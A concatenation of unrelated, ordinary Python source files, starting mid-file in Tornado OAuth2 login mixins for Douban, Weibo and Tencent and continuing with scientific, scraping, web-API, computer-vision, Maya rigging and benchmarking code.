        # Token response arrives as JSON; then fetch the user's profile.
        if response.error:
            logging.error('Douban auth error: %s' % str(response))
            callback(None)
            return
        response_dict = escape.json_decode(response.body)
        oauth2_info = {
            "access_token": response_dict["access_token"],
            "expires_in": response_dict["expires_in"],
            "douban_user_id": response_dict["douban_user_id"],
            "refresh_token": response_dict["refresh_token"]
        }
        self.api_request(
            url= self._OAUTH_USER_INFO_URL,
            method="GET",
            callback=self.async_callback(self._on_get_user_info, callback, oauth2_info),
            access_token=oauth2_info["access_token"],
            douban_user_id=oauth2_info["douban_user_id"]
        )

    def api_request(self, url, method, callback, access_token=None, expires_in=None, **args):
        # Generic authenticated Douban API call (Bearer token header).
        header = HTTPHeaders({'Authorization': 'Bearer %s' % access_token})
        http_client = httpclient.AsyncHTTPClient()
        callback = self.async_callback(self._on_api_request, callback)
        # Debug trace of the request URL (Python 2 print statement).
        print url
        if method == "POST":
            http_client.fetch(url, method=method, body=urlencode(args), callback=callback, headers=header)
        else:
            #url += "&" + urlencode(args)
            http_client.fetch(url, callback=callback, headers=header)

    def _on_api_request(self, callback, response):
        # Decode the JSON body, or pass None through on any HTTP error.
        if response.error:
            logging.warning("Error response %s %s fetching %s", response.error,response.body,
                            response.request.url)
            callback(None)
            return
        callback(escape.json_decode(response.body))
class WeiboMixin(OAuth2Mixin):
    """Tornado OAuth2 mix-in for Sina Weibo sign-in and API calls."""

    _OAUTH_ACCESS_TOKEN_URL = "https://api.weibo.com/oauth2/access_token"
    _OAUTH_AUTHORIZE_URL = "https://api.weibo.com/oauth2/authorize"
    _OAUTH_NO_CALLBACKS = False
    _OAUTH_USER_INFO_URL = "https://api.weibo.com/2/users/show.json"
    _PORT = "weibo"

    def _on_get_user_info(self, callback, oauth2_info, user):
        # Normalize the raw Weibo profile into the app's user_info dict.
        if user is None:
            callback(None)
            return
        user_info = {
            "username": "%s#%s" %(user.get("screen_name"), self._PORT),
            "nickname": user.get("screen_name"),
            "gender": user.get("gender"),
            "access_token": oauth2_info["access_token"],
            "oauth_id": oauth2_info["uid"],
            "port": self._PORT,
            "oauth_info": {
                # NOTE(review): .encode crashes if "description" is missing.
                "description": user.get("description").encode("utf-8"),
                "province": user.get("province"),
                "city": user.get("city"),
                "location": user.get("location"),
                "profile_image_url": user.get("profile_image_url"),
                "oauth2_expires": oauth2_info["expires_in"],
            }
        }
        callback(user_info)

    def get_authenticated_user(self, redirect_uri, client_id, client_secret, code, extra_params, callback):
        # Exchange the authorization code for an access token (POST).
        http_client = httpclient.AsyncHTTPClient()
        args = {
            "redirect_uri": redirect_uri,
            "code": code,
            "client_id": client_id,
            "client_secret": client_secret,
            "extra_params": extra_params
        }
        http_client.fetch(
            self._oauth_request_token_url(**args),
            self.async_callback(
                self._on_access_token,
                redirect_uri,
                client_id,
                client_secret,
                callback),
            method="POST",
            body=urlencode(args))

    def _on_access_token(self, redirect_uri, client_id, client_secret, callback, response):
        # Token response arrives as JSON; then fetch the user's profile.
        if response.error:
            logging.error('Weibo auth error: %s' % str(response))
            callback(None)
            return
        response_dict = escape.json_decode(response.body)
        oauth2_info = {
            "access_token": response_dict["access_token"],
            "expires_in": response_dict["expires_in"],
            "uid": response_dict["uid"]
        }
        self.api_request(
            url= self._OAUTH_USER_INFO_URL,
            method="GET",
            callback=self.async_callback(self._on_get_user_info, callback, oauth2_info),
            access_token=oauth2_info["access_token"],
            uid=oauth2_info["uid"]
        )

    def api_request(self, url, method, callback, access_token=None, expires_in=None, **args):
        # Generic authenticated Weibo API call: the token is sent both as a
        # header and as a query-string/form parameter.
        if access_token:
            args.update(access_token=access_token)
        header = HTTPHeaders({'Authorization': 'OAuth2 %s' % access_token})
        http_client = httpclient.AsyncHTTPClient()
        callback = self.async_callback(self._on_api_request, callback)
        url += "?" + urlencode({"access_token": access_token})
        if method == "POST":
            http_client.fetch(url, method=method, body=urlencode(args), callback=callback, headers=header)
        else:
            url += "&" + urlencode(args)
            http_client.fetch(url, callback=callback, headers=header)

    def _on_api_request(self, callback, response):
        # Decode the JSON body, or pass None through on any HTTP error.
        if response.error:
            logging.warning("Error response %s %s fetching %s", response.error,response.body,
                            response.request.url)
            callback(None)
            return
        callback(escape.json_decode(response.body))
class TencentMixin(OAuth2Mixin):
    """Tornado OAuth2 mix-in for Tencent Weibo sign-in and API calls.

    Unlike the other mixins, Tencent returns the token response as a
    query-string (parsed with parse_qs), not JSON.
    """

    _OAUTH_ACCESS_TOKEN_URL = "https://open.t.qq.com/cgi-bin/oauth2/access_token"
    _OAUTH_AUTHORIZE_URL = "https://open.t.qq.com/cgi-bin/oauth2/authorize"
    _OAUTH_NO_CALLBACKS = False
    _OAUTH_USER_INFO_URL = "https://open.t.qq.com/api/user/info"
    _PORT = "tencent"

    def get_authenticated_user(self, redirect_uri, client_id, client_secret, code, openid, callback):
        # Exchange the authorization code for an access token (POST).
        # grant_type is added to the body only, after the URL is built.
        http_client = httpclient.AsyncHTTPClient()
        args = {
            "redirect_uri": redirect_uri,
            "code": code,
            "client_id": client_id,
            "client_secret": client_secret,
        }
        url = self._oauth_request_token_url(**args)
        args.update(grant_type="authorization_code")
        http_client.fetch(url,
            self.async_callback(
                self._on_access_token,
                redirect_uri,
                client_id,
                client_secret,
                openid,
                callback),
            method="POST",
            body=urlencode(args))

    def _on_access_token(self, redirect_uri, client_id, client_secret, openid, callback, response):
        # NOTE(review): the log message says "Weibo" — copy/paste leftover.
        if response.error:
            logging.error('Weibo auth error: %s' % str(response))
            callback(None)
            return
        # Token response is querystring-encoded; parse_qs yields lists.
        response_dict = parse_qs(response.body)
        oauth2_info = {
            "client_id": client_id,
            "access_token": response_dict["access_token"][0],
            "expires_in": response_dict["expires_in"][0],
            "openid": openid
        }
        self.api_request(
            self._OAUTH_USER_INFO_URL,
            "GET",
            self.async_callback(self._on_get_user_info, callback, oauth2_info),
            oauth2_info["access_token"],
            oauth2_info["expires_in"],
            openid=oauth2_info["openid"],
            oauth_consumer_key=oauth2_info["client_id"],
            oauth_version="2.a",
            scope="all"
        )

    def api_request(self, url, method, callback, access_token=None, expires_in=None, **args):
        # Generic authenticated Tencent API call: the token is sent both as a
        # header and as a query-string/form parameter.
        if access_token:
            args.update(access_token=access_token)
        header = HTTPHeaders({'Authorization': 'OAuth2 %s' % access_token})
        http_client = httpclient.AsyncHTTPClient()
        callback = self.async_callback(self._on_api_request, callback)
        url += "?" + urlencode({"access_token": access_token})
        if method == "POST":
            http_client.fetch(url, method=method, body=urlencode(args), callback=callback, headers=header)
        else:
            url += "&" + urlencode(args)
            http_client.fetch(url, callback=callback, headers=header)

    def _on_api_request(self, callback, response):
        # Decode the JSON body, or pass None through on any HTTP error.
        if response.error:
            logging.warning("Error response %s %s fetching %s", response.error,response.body,
                            response.request.url)
            callback(None)
            return
        callback(escape.json_decode(response.body))

    def _on_get_user_info(self, callback, oauth2_info, user):
        # Tencent wraps the profile in a "data" envelope.
        if user is None:
            callback(None)
            return
        content = user["data"]
        user_info = {
            "username": "%s#%s" %(content["name"], self._PORT),
            "nickname": content["nick"],
            "access_token": oauth2_info["access_token"],
            "oauth_id": oauth2_info["openid"],
            "port": self._PORT,
            "oauth_info": {
                "description": content["introduction"].encode("utf-8"),
                "location": content["location"],
                # "/50" selects the 50px avatar variant of the head URL.
                "profile_image_url": "%s/50" %content["head"],
                "oauth2_expires": oauth2_info["expires_in"],
            }
        }
        callback(user_info)
|
import numpy as np
from scipy import interpolate
from scipy import fftpack
from scipy import signal
import math
import pdb
import matplotlib.pyplot as plt
class AScan:
    """Builds an OCT A-scan (depth profile) from a raw spectrometer spectrum.

    Processing chain: deconvolve the reference (source) spectrum, apply a
    Blackman window and remove DC, spline-resample onto the precomputed
    resampling table, then take the magnitude of the positive FFT bins.
    """

    def __init__(self, ref_spectrum, resample, imrange):
        # Reference (source) spectrum used for deconvolution.
        self.ref_spectrum = ref_spectrum
        # Fractional sample positions for spectral resampling.
        self.resampling_table = resample
        # Imaging range; stored for callers (not used inside this class).
        self.range = imrange

    def deconv_threshold(self, spectrum_val, ref_val):
        """Deconvolve one sample against the reference, gated by a threshold.

        Returns 0.0 when the reference value is <= 0.1 (too small to divide
        by safely); the +1000.0 offsets keep the ratio well-conditioned.
        """
        if ref_val > 0.1:
            return float(((spectrum_val + 1000.0) / (ref_val + 1000.0)) - 1)
        return 0.0

    def deconv_method(self, spectrum):
        """Deconvolve the source spectrum from the OCT signal and window it.

        The window length now follows len(spectrum) instead of the previous
        hard-coded 1024, so non-1024-sample spectra are handled too.
        """
        n = len(spectrum)
        deconv = [self.deconv_threshold(spectrum[i], self.ref_spectrum[i])
                  for i in range(n)]
        # The original named this "nuttall" but actually built a Blackman
        # window; the Blackman shape is kept so output is unchanged.
        window = np.blackman(n)
        windowed = deconv * window
        # Remove the DC component before the FFT.
        return np.array(windowed - np.mean(windowed), dtype='float32')

    def a_scan(self, spectrum):
        """Compute the A-scan magnitude for one spectrum."""
        np_deconv = self.deconv_method(spectrum)
        # Cubic-spline resampling onto the precomputed grid.
        spline = interpolate.splrep(np.arange(0, len(np_deconv)), np_deconv, s=0)
        xnew = np.array(self.resampling_table, dtype='float32')
        self.deconv_interpolated_spectrum = np.float32(
            interpolate.splev(xnew, spline))
        return self.correction_method()

    def range_envelope(self, spectrum):
        """Magnitude of the positive-frequency FFT bins (bins 1..511)."""
        positive_complex_freqs = fftpack.fft(spectrum)[1:512]
        return np.abs(positive_complex_freqs)

    def correction_method(self):
        # Local renamed from `signal`, which shadowed the scipy.signal module.
        envelope = self.range_envelope(self.deconv_interpolated_spectrum)
        return envelope
import os
import json
class Pyson:
    '''Allows for easier manipulation of json files.

    It will check if a json file already exists with the given file name and
    open that, otherwise it will create a new one.
    Default datatype is a DICT, but you can pass what you want to it.
    EX: example=Pyson(file_name,[]) would pass a list to the json.
    To update the data, modify the json with using the "data" attribute.
    EX: example.data.append('test') would add 'test' to the list declared above.
    Commit changes with the "save" attribute.
    EX: example.save would save the changes to the json file'''

    def __init__(self, file_name, data=None):
        # `data=None` avoids the shared-mutable-default pitfall the original
        # `data={}` had: every default-constructed instance shared one dict.
        if data is None:
            data = {}
        if not file_name.endswith('.json'):
            file_name += '.json'
        if os.path.isfile(file_name):
            try:
                with open(file_name) as f:
                    data = json.load(f)
            except ValueError:
                # Corrupt or empty JSON: fall back to the provided default.
                pass
        self.file_name = file_name
        self.data = data

    @property
    def save(self):
        '''Write self.data to the json file (pretty-printed, sorted keys).'''
        if not self.file_name.endswith('.json'):
            self.file_name += '.json'
        with open(self.file_name, "w") as f:
            json.dump(self.data, f, indent=4, sort_keys=True)
|
from micompy.common.tools.bbmap import BBmap
from micompy.common.tools.checkm import CheckM
from micompy.common.tools.mash import MASH
from micompy.common.tools.hmmer import HMMer
from micompy.common.tools.tool import Tool
class WorkBench(object):
    """A name -> Tool registry for the analysis pipeline."""

    def __init__(self):
        # Mapping of tool name to Tool instance.
        self.tools = {}

    def __getitem__(self, key):
        # Returns None (rather than raising KeyError) for unknown tool names.
        return self.tools.get(key)

    def add_tool(self, tool, name = None):
        """Register `tool` under `name` (defaults to tool.name).

        Uses str.format so a non-Tool, non-str argument still produces the
        assertion message; the original `tool + " is not a tool"` raised
        TypeError instead of AssertionError for such inputs.
        """
        assert isinstance(tool, Tool), "{} is not a tool".format(tool)
        self.tools[name if name else tool.name] = tool

    def default_bench(self):
        """Populate the bench with the standard tool set."""
        self.add_tool(BBmap())
        self.add_tool(CheckM())
        self.add_tool(MASH())
        self.add_tool(HMMer())
|
import requests
from pymongo import MongoClient
from selenium import webdriver
from bs4 import BeautifulSoup
import time
# Connect to the local MongoDB instance (database: dbsparta).
client = MongoClient('localhost', 27017)
db = client.dbsparta
# Path to the chromedriver binary Selenium needs to drive Chrome.
chrome_path = '/Users/apple/Desktop/sparta/projects/recycling/chromedriver'
driver = webdriver.Chrome(chrome_path)
# Google News search-results page for "recycling" (US English locale).
url = 'https://news.google.com/search?q=recycling&hl=en-US&gl=US&ceid=US%3Aen'
# Open the page in Chrome.
driver.get(url)
# Wait 2 seconds for the page content to load.
time.sleep(2)
def get_articles_google():
    """Scrape the Google News results page and return a list of article URLs.

    NOTE(review): the selector '#div.93789 > a.VDXfz' looks like a snapshot
    of Google's obfuscated class names and likely no longer matches the live
    markup — verify against the current page before relying on this.
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}
    data = requests.get('https://news.google.com/search?q=recycling&hl=en-US&gl=US&ceid=US%3Aen', headers=headers)
    soup = BeautifulSoup(data.text, 'html.parser')
    uls = soup.select('#div.93789 > a.VDXfz')
    urls = []
    for ul in uls:
        # Each matched element is expected to wrap an <article><a href=...>.
        a = ul.select_one('article > a')
        if a is not None:
            url = a['href']
            urls.append(url)
    return urls
# Fetch the photo, title and description of a news article from its source
# URL and store them in the engarticles collection.
def insert_engarticles(url):
    """Scrape og: meta tags from `url` and insert one document into MongoDB.

    NOTE(review): `select_one(...)` returns None if a tag is missing, so the
    `["content"]` lookups below raise TypeError for pages without OG tags.
    """
    headers = {
        'accept-charset': 'UTF-8',
        'Content-Type': 'text/html; charset=utf-8',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}
    data = requests.get(url, headers=headers)
    soup = BeautifulSoup(data.text, 'html.parser')
    # Open Graph metadata.
    title = soup.select_one('meta[property="og:title"]')["content"]
    image = soup.select_one('meta[property="og:image"]')["content"]
    desc = soup.select_one('meta[property="og:description"]')["content"]
    doc = {
        'title': title,
        'image': image,
        'description': desc,
        'isKor': False,  # these articles come from the English-language feed
        'url': url,
    }
    db.engarticles.insert_one(doc)
    print('완료!', title)
# Scrape all article URLs, store each one, then quit Chrome.
urls = get_articles_google()
for url in urls:
    insert_engarticles(url)
driver.quit()
from flask import Blueprint, g
from sqlalchemy import or_
from grant.utils.enums import RFPStatus
from grant.utils.auth import requires_auth
from grant.parser import body
from .models import RFP, rfp_schema, rfps_schema, db
from marshmallow import fields
blueprint = Blueprint("rfp", __name__, url_prefix="/api/v1/rfps")
@blueprint.route("/", methods=["GET"])
def get_rfps():
    """Return all public (LIVE or CLOSED) RFPs, newest first.

    DRAFT RFPs are excluded by the status filter.
    """
    rfps = RFP.query \
        .filter(or_(
            RFP.status == RFPStatus.LIVE,
            RFP.status == RFPStatus.CLOSED,
        )) \
        .order_by(RFP.date_created.desc()) \
        .all()
    return rfps_schema.dump(rfps)
@blueprint.route("/<rfp_id>", methods=["GET"])
def get_rfp(rfp_id):
    """Return a single RFP by id; DRAFT RFPs are hidden as if absent (404)."""
    rfp = RFP.query.filter_by(id=rfp_id).first()
    if not rfp or rfp.status == RFPStatus.DRAFT:
        return {"message": "No RFP with that ID"}, 404
    return rfp_schema.dump(rfp)
@blueprint.route("/<rfp_id>/like", methods=["PUT"])
@requires_auth
@body({"isLiked": fields.Bool(required=True)})
def like_rfp(rfp_id, is_liked):
    """Set or clear the authenticated user's like on a LIVE RFP.

    The `isLiked` body field arrives as the `is_liked` argument via the
    @body parser decorator.
    """
    user = g.current_user

    # Make sure rfp exists
    rfp = RFP.query.filter_by(id=rfp_id).first()
    if not rfp:
        return {"message": "No RFP matching id"}, 404
    # Only LIVE RFPs can be liked.
    if not rfp.status == RFPStatus.LIVE:
        return {"message": "RFP is not live"}, 404

    rfp.like(user, is_liked)
    db.session.commit()
    return {"message": "ok"}, 200
|
# Copyright 2023 Pulser Development Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines weight maps on top of traps."""
from __future__ import annotations
from dataclasses import dataclass
from typing import Optional, cast
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.axes import Axes
from numpy.typing import ArrayLike
from pulser.register._reg_drawer import RegDrawer
@dataclass
class WeightMap(RegDrawer):
    """Defines a generic map of weights on traps.

    The sum of the provided weights must be equal to 1.

    Args:
        trap_coordinates: An array containing the coordinates of the traps.
        weights: A list weights to associate to the traps.
    """

    trap_coordinates: ArrayLike
    weights: list[float]

    def __post_init__(self) -> None:
        # Validate the weights against the trap layout.
        if len(cast(list, self.trap_coordinates)) != len(self.weights):
            raise ValueError("Number of traps and weights don't match.")
        if not np.all(np.array(self.weights) >= 0):
            raise ValueError("All weights must be non-negative.")
        if not np.isclose(sum(self.weights), 1.0, atol=1e-16):
            raise ValueError("The sum of the weights should be 1.")

    def draw(
        self,
        with_labels: bool = True,
        fig_name: str | None = None,
        kwargs_savefig: dict | None = None,
        custom_ax: Optional[Axes] = None,
        show: bool = True,
    ) -> None:
        """Draws the detuning map.

        Args:
            with_labels: If True, writes the qubit ID's
                next to each qubit.
            fig_name: The name on which to save the figure.
                If None the figure will not be saved.
            kwargs_savefig: Keywords arguments for
                ``matplotlib.pyplot.savefig``. Not applicable if `fig_name`
                is ``None``. Defaults to no extra arguments.
            custom_ax: If present, instead of creating its own Axes object,
                the function will use the provided one. Warning: if fig_name
                is set, it may save content beyond what is drawn in this
                function.
            show: Whether or not to call `plt.show()` before returning. When
                combining this plot with other ones in a single figure, one may
                need to set this flag to False.
        """
        # `None` default replaces the original mutable `{}` default argument,
        # which was shared between all calls.
        if kwargs_savefig is None:
            kwargs_savefig = {}
        pos = np.array(self.trap_coordinates)
        if custom_ax is None:
            _, custom_ax = self._initialize_fig_axes(pos)
        super()._draw_2D(
            custom_ax,
            pos,
            [i for i, _ in enumerate(cast(list, self.trap_coordinates))],
            with_labels=with_labels,
            dmm_qubits=dict(enumerate(self.weights)),
        )
        if fig_name is not None:
            plt.savefig(fig_name, **kwargs_savefig)
        if show:
            plt.show()
@dataclass
class DetuningMap(WeightMap):
    """Defines a DetuningMap.

    A DetuningMap associates a detuning weight to the coordinates of a trap.
    The sum of the provided weights must be equal to 1.
    All behavior (validation, drawing) is inherited from WeightMap.

    Args:
        trap_coordinates: an array containing the coordinates of the traps.
        weights: A list of detuning weights to associate to the traps.
    """
|
import cv2
import numpy as np
import Detect_lines as dec
import Segmentation as s
import os
# ============================================================================
def reduce_colors(img, n):
    """Quantize *img* down to *n* colors using k-means clustering."""
    # Flatten to a list of float32 BGR pixels, as cv2.kmeans requires.
    pixels = np.float32(img.reshape((-1, 3)))

    # Stop after 10 iterations or when cluster movement falls below 1.0.
    criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
    _compactness, labels, centers = cv2.kmeans(
        pixels, n, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)

    # Replace every pixel with its cluster center, then restore the shape.
    centers = np.uint8(centers)
    quantized = centers[labels.flatten()]
    return quantized.reshape(img.shape)
# ============================================================================
def clean_image(img):
    """Convert the plate image to grayscale and erode it slightly.

    Also writes a debug PNG ('licence_plate_mask2.png') as a side effect,
    matching the original pipeline.
    """
    grayscale = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    # A single erosion with a 3x3 rectangular kernel thins glyph strokes.
    kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))
    mask = cv2.erode(grayscale, kernel, iterations=1)
    cv2.imwrite('licence_plate_mask2.png', mask)
    return mask
# ============================================================================
def extract_characters(img):
    """Find candidate character regions in a cleaned plate image.

    Returns a list of ((point1, point2), char_image) tuples sorted
    left-to-right by bounding box.
    """
    # bw_image = cv2.bitwise_not(img)
    # NOTE(review): indexing [1] assumes the OpenCV 3.x return signature
    # (image, contours, hierarchy); under OpenCV 2.x/4.x findContours
    # returns (contours, hierarchy) and [1] would pick the hierarchy.
    contours = cv2.findContours(img, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)[1]
    height = np.size(img, 0)
    width = np.size(img, 1)
    # Acceptable character size, as a percentage of the plate dimensions.
    h_coef_min = 12
    h_coef_max = 90
    w_coef_min = 10
    w_coef_max = 90
    h_max = height * h_coef_max / 100
    h_min = height * h_coef_min / 100
    w_max = width * w_coef_max / 100
    w_min = width * w_coef_min / 100
    char_mask = np.zeros_like(img)
    # Keep only the 20 largest contours by area.
    contours = sorted(contours, key=cv2.contourArea, reverse=True)[:20]
    bounding_boxes = []
    for c in contours:
        # Approximate each contour, then reduce it to a corner-point pair.
        peri = cv2.arcLength(c, True)
        ap = cv2.approxPolyDP(c, 0.02 * peri, True)
        oh = s.max_min(ap)
        point1, point2 = s.max_min(ap)
        # take_character presumably accepts boxes within the size limits —
        # verify in the Segmentation module.
        t = s.take_character((h_min, h_max), (w_min, w_max), point1, point2)
        if t:
            bounding_boxes.append(oh)
            cv2.rectangle(char_mask, point1, point2, 255, -1)
    bounding_boxes.sort()
    # delete_crosses presumably removes overlapping/crossing boxes.
    ter = s.delete_crosses(bounding_boxes)
    for point1, point2 in ter:
        cv2.rectangle(char_mask , point1, point2, 255, 1)
    characters = []
    for point1, point2 in ter:
        x, y, = point1
        w, h = point2
        # Crop the character region out of the source image.
        char_image = dec.roi_area(img,point1, point2)
        # dec.open_picture(char_image,'t')
        characters.append(((point1, point2), char_image))
    return characters
def highlight_characters(img, chars):
    """Return a BGR copy of img with a 1px box drawn around each character."""
    annotated = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
    for (top_left, bottom_right), _unused_glyph in chars:
        cv2.rectangle(annotated, top_left, bottom_right, 255, 1)
    return annotated
def model_knn(samples, responses):
    """Train a kNN classifier from whitespace-separated sample/label files.

    samples/responses are paths readable by np.loadtxt; labels are reshaped
    to a single column as required by cv2.ml.
    """
    sample_matrix = np.loadtxt(samples, np.float32)
    labels = np.loadtxt(responses, np.float32).reshape(-1, 1)
    knn = cv2.ml.KNearest_create()
    knn.train(sample_matrix, cv2.ml.ROW_SAMPLE, labels)
    return knn
# ============================================================================
# Driver: run the trained kNN models over each licence-plate ROI image.
# (dead commented-out experiments removed; restore from version control)
plate_files = ['353.png']  # BUG FIX: was `dir`, shadowing the builtin
charss = model_knn(r'D:\Github_project\OPENCV_Examples\OPENCV\Test\chars_samples.data', r'D:\Github_project\OPENCV_Examples\OPENCV\Test\chars_responses.data')
digits = model_knn(r'D:\Github_project\OPENCV_Examples\OPENCV\Test\digits_samples.data', r'D:\Github_project\OPENCV_Examples\OPENCV\Test\digits_responses.data')
for j in plate_files:
    # load, binarise and segment the plate into glyph images
    img = cv2.imread(r'D:\Github_project\VKR\ROI_PICTURE\{0}'.format(j))
    img = clean_image(img)
    chars = extract_characters(img)
    plate_chars = ""
    digits_chars = ''
    for bbox, char_img in chars:
        # normalise the glyph to the 100x120 size used when training
        small_img = cv2.resize(char_img, (100, 120))
        small_img = small_img.reshape((1, 12000))
        small_img = np.float32(small_img)
        retval, results, neigh_resp, dists = digits.findNearest(small_img, k=1)
        # BUG FIX: chr() needs an int; `results` is a 1x1 float array
        print(str(chr(int(results[0][0]))))
        retval, results, neigh_resp, dists = charss.findNearest(small_img, k=1)
|
# read today's distance and the target distance (in the same units)
current = int(input())
target = int(input())
days = 1
while current < target:
    current += current * 0.1  # the distance grows by 10% each day
    days += 1
print(days)
|
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) Qotto, 2019
""" File contain all Tonga decorator
"""
from functools import wraps
from typing import Any, Callable
from tonga.stores.manager.errors import UninitializedStore
__all__ = [
'check_initialized'
]
def check_initialized(func: Callable) -> Any:
    """Decorator ensuring the store is initialized before *func* runs.

    Args:
        func (Callable): Coroutine function to wrap; its first positional
            argument must expose `is_initialized()`

    Raises:
        UninitializedStore: Raised when the store is not initialized

    Returns:
        Any: Result of the wrapped coroutine
    """
    @wraps(func)
    async def wrapper(*args, **kwargs):
        store = args[0]
        if not store.is_initialized():
            raise UninitializedStore('Uninitialized store', 500)
        return await func(*args, **kwargs)
    return wrapper
|
"""
defaultRig deformation setup
"""
import maya.cmds as mc
import maya.mel as mm
import glob
from rigTools import bSkinSaver
from . import project
from rigLib.utils import name
def build(baseRig, characterName):
    """Assemble the deformation layer for the given character rig."""
    # gather all model geometry under the character's model group
    modelGroupName = '%s_model_grp' % characterName
    geometry = _getModelGeoObjects(modelGroupName)
    # loadSkinWeights(characterName, geometry)
    if project.mush:
        # smooth the body geometry with a delta mush deformer
        _applyDeltaMush(project.bodyGeo)
    if project.bodyHighResGeo:
        # drive the high resolution mesh with the deforming body geo
        makeWrap([project.bodyHighResGeo], project.bodyGeo)
def makeWrap(wrappedObjs, wrapper):
    """Create a wrap deformer driving wrappedObjs by the wrapper mesh."""
    # the MEL wrap command operates on the current selection:
    # wrapped objects first, influence (wrapper) object last
    mc.select(wrappedObjs)
    mc.select(wrapper, add=1)
    # argument string mirrors Maya's Create Deformer > Wrap defaults
    mm.eval('doWrapArgList "7" {"1","0","1","2","1","1","0","0"}')
def _applyDeltaMush(geo):
    """Apply a delta mush deformer to geo and return the deformer node.

    The original indexed the command result with [0] and discarded it;
    returning the node name makes the helper reusable (callers that
    ignored the previous None return are unaffected).
    """
    return mc.deltaMush(geo, smoothingIterations=50)[0]
def _getModelGeoObjects(modelGrp):
    """Return the transform node for every mesh shape under modelGrp."""
    shapes = mc.listRelatives(modelGrp, ad=1, type='mesh', f=1)
    # walk up from each mesh shape to its parent transform
    return [mc.listRelatives(shape, p=1)[0] for shape in shapes]
def makeTwistJoints(baseRig, parentJoints):
    """Create twist-joint pairs under each parent joint.

    For every joint in parentJoints, duplicates the joint and its first
    child joint, parents them into a group under the rig's joints group,
    and attaches them with a point constraint plus a single-chain IK
    handle constrained to the child, so the chain counter-rotates (twists)
    with the parent joint.
    """
    twistJointsMainGrp = mc.group(n='twistJoints_grp',p = baseRig.jointsGrp, em=1)
    for parentJoint in parentJoints:
        prefix = name.removeSuffix(parentJoint)
        prefix = prefix[:-1] # remove number I.E. pinky_knuckle2 = pinky_knuckle. not so good...
        parentJointChild = mc.listRelatives(parentJoint, c=1, type= 'joint')[0]
        #make twist joints
        twistJointGroup = mc.group(name = prefix +'_twistJoint_grp', em= 1, p=twistJointsMainGrp)
        twistParentJoint = mc.duplicate(parentJoint, n= prefix + 'Twist1_jnt', parentOnly = 1)[0]
        twistChildJoint = mc.duplicate(parentJointChild, n= prefix + 'Twist2_jnt', parentOnly = 1)[0]
        #twistJointsCosmetics: slightly larger radius and user-defined color
        origJntRadius = mc.getAttr(parentJoint + '.radius')
        for j in [twistParentJoint,twistChildJoint]:
            mc.setAttr(j +'.radius', origJntRadius + 0.3)
            mc.color(j, ud = 1)
        mc.parent(twistChildJoint, twistParentJoint)
        mc.parent(twistParentJoint,twistJointGroup)
        #attach twist joints: follow the parent joint's translation
        mc.pointConstraint( parentJoint, twistParentJoint)
        #make ik-handle (single-chain solver) so the twist chain aims at the child
        twistIK = mc.ikHandle(n= prefix + 'twistJoint_iKH', sol = 'ikSCsolver', sj= twistParentJoint, ee= twistChildJoint)[0]
        mc.hide(twistIK)
        mc.parent(twistIK, twistJointGroup)
        mc.parentConstraint(parentJointChild, twistIK)
def saveSkinWeights(characterName, geoList=None):
    """
    save weights for character geometry objects

    BUG FIX: the default was a shared mutable list ([]); use None instead.
    Callers passing an explicit list are unaffected.
    """
    if geoList is None:
        geoList = []
    for obj in geoList:
        # weight file lives under the character's asset folder
        skinWeightsPath = '%s/assets/%s/weights/skinCluster/%s.swt' % (project.projectPath, characterName, obj)
        # bSkinSaver operates on the current selection
        mc.select(obj)
        bSkinSaver.bSaveSkinValues(skinWeightsPath)
def loadSkinWeights(characterName, geoList=None):
    """
    load skin weights for character geometry objects

    BUG FIX: the default was a shared mutable list ([]); use None instead.
    """
    if geoList is None:
        geoList = []
    skinWeightsPath = '%s/assets/%s/weights/skinCluster/' % (project.projectPath, characterName)
    # reference selected geo's weights
    if len(geoList) > 0:
        selFilePaths = [f for g in geoList for f in glob.glob(skinWeightsPath + g + '.swt')]
    # or load all skin weights
    else:
        selFilePaths = [f for f in glob.glob(skinWeightsPath + '*.swt')]
    for geo in selFilePaths:
        print(geo)  # parenthesised so this works under Python 2 and 3
        bSkinSaver.bLoadSkinValues(loadOnSelection=False, inputFile=geo)
from bbob3 import bbobbenchmarks
import numpy as np
def getbenchmark(fid, dim, instance=None, zerox=False, zerof=True, param=None):
    """Returns an instance of the specified BBOB function

    Keyword arguments:
    fid -- the function ID (1 to 24)
    dim -- the number of dimensions (positive)
    instance -- the instance seed (default is randomly generated)
    zerox -- center fopt at the zero vector if possible (default False)
    zerof -- global optimum fitness is 0 (default True)
    param -- function specific parameter (default None)
    """
    # idiom fixes: isinstance() instead of type()==, `is None` instead of ==
    assert isinstance(fid, int)
    assert 1 <= fid <= 24
    assert isinstance(dim, int)
    assert dim >= 1
    assert instance is None or isinstance(instance, int)
    assert isinstance(zerox, bool)
    assert isinstance(zerof, bool)
    if instance is None:
        # draw a non-negative 32-bit seed (np.random.randint high is exclusive)
        instance = np.random.randint(low=-2147483648, high=2147483647) + 2147483648
    benchmark = getattr(bbobbenchmarks, "F" + str(fid))
    f = benchmark(instance, zerox=zerox, zerof=zerof, param=param)
    f.initwithsize((dim,), dim)
    assert f.dim == dim
    # annotate the instance with the BBOB search-space bounds
    f.xmin = -5
    f.xmax = 5
    f.maximising = False
    f.__name__ = f.shortstr()
    f.fid = fid
    return f
if __name__ == '__main__':
    # smoke test: build every BBOB function and show where its optimum lies
    DIM = 4
    for i in range(1, 24+1):
        f = getbenchmark(i, DIM)
        print(f.__name__, "with", f.fopt, "at", f.xopt)
